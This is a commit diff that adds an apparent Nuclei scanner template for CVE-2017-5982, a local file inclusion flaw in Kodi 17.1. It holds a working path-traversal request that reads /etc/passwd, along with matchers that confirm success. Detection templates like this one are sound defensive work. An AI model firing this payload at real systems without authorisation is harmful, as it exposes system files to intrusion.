commit
46a1ecd36a
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2017-5982
|
||||||
|
info:
|
||||||
|
name: Kodi 17.1 Local File Inclusion
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://cxsecurity.com/issue/WLB-2017020164
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2017-5982
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2017-5982
|
||||||
|
cwe-id: CWE-98
|
||||||
|
tags: cve,cve2017,kodi,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue